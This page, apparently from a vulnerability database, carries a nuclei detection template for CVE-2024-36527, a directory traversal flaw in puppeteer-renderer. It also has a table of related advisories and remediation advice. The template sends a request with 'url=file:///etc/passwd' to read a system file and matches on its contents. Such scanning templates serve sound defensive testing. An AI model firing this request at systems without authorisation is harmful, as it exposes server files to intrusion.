Lucene search
K

Puppeteer Renderer - Directory Traversal

🗓️ 04 Feb 2026 07:00:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 40 Views

Puppeteer Renderer - Directory Traversal, CVE-2024-36527. Vulnerability allows attackers to read sensitive server files via URL parameter

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2024-36527
20 Jun 202409:42
githubexploit
Circl
CVE-2024-36527
20 Jun 202409:47
circl
CNNVD
Puppeteer Security Vulnerabilities
17 Jun 202400:00
cnnvd
CVE
CVE-2024-36527
17 Jun 202400:00
cve
Cvelist
CVE-2024-36527
17 Jun 202400:00
cvelist
NVD
CVE-2024-36527
17 Jun 202418:15
nvd
OpenVAS
Generic HTTP Directory Traversal / File Inclusion (Web Application URL Parameter) - Active Check
26 Sep 201700:00
openvas
Positive Technologies
PT-2024-27048 · Unknown · Puppeteer-Renderer
17 Jun 202400:00
ptsecurity
RedhatCVE
CVE-2024-36527
23 May 202509:19
redhatcve
Vulnrichment
CVE-2024-36527
17 Jun 202400:00
vulnrichment
Rows per page
id: CVE-2024-36527

info:
  name: Puppeteer Renderer - Directory Traversal
  author: Stux
  severity: medium
  description: |
    puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal. Attackers can exploit the URL parameter using the file protocol to read sensitive information from the server.
  impact: |
    An attacker can exploit this vulnerability to read arbitrary files on the server, potentially gaining access to sensitive information.
  remediation: |
    Users should update to version 3.3.0 or later where this issue has been addressed. Additionally, ensure that input validation is implemented to restrict the url parameter to only http and https protocols.
  reference:
    - https://github.com/zenato/puppeteer-renderer/issues/97
    - https://gist.github.com/7a6163/25fef08f75eed219c8ca21e332d6e911
  metadata:
    max-request: 1
    verified: true
  tags: cve,cve2024,puppeteer-renderer,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/html?url=file:///etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ee4684e9c01b2cbed3c1e9f696d26e074ca892907da74a3ab65601c3c564588d022053a66bfa4d9c0657583de8dc880bc8714c82f2491acc7c7b90ece28225fcf00c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
9.1High risk
Vulners AI Score9.1
CVSS 3.16.5
EPSS0.02559
SSVC
40